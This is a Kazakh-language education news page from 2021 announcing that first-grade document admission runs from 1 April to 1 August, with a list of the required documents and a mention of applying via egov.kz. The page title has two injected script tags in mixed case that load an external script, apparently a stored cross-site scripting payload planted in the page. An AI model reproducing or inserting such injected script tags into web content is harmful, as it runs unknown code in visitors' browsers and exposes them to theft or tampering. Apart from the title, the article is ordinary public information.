Бірінші сыныпқа құжаттарды қабылдау<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.03.2021

Бірінші сынып оқушыларының құжаттарын қабылдау 1 сәуірде басталады

Бірінші сынып оқушыларының құжаттарын қабылдау 1 сәуірде басталып, 1 тамызға дейін жалғасады. Бұл – білім беру процесіне қатысушыларға ыңғайлы болу үшін қабылданған шешім.

  • Ата-аналар мектепті алдын-ала анықтап, оқуға қажетті құжаттарды уақытылы тапсырады, сондай-ақ балаларды оқу құралдарымен қамтамасыз етеді.
  • Мектеп басшылығы сыныптарды жинақтап, қажетті оқулықтарды алдын ала сатып алады. Сонымен қатар педагогтер құрамын анықтап, сағат санын бөледі.
  • Өтінішті egov.kz арқылы беруге болады. Қажетті құжаттар тізімі:
  •  Ата-аналардың өтініші (немесе оларды алмастыратын тұлғалар);
  •  Баланың туу туралы куәлігінің көшірмесі;
  •  «Бала денсаулығы паспорты» 026/у-3 нысаны бойынша денсаулық жағдайы туралы құжат;
  •  063/у нысаны бойынша денсаулық жағдайы туралы құжат;
  •  3х4 көлеміндегі 2 фото.

Өтініш бір жұмыс күні ішінде қарастырылады.

 

@edu_news_qz

Просмотров: 413


Пікір қосу



Деректерді қолтаңбаға қосу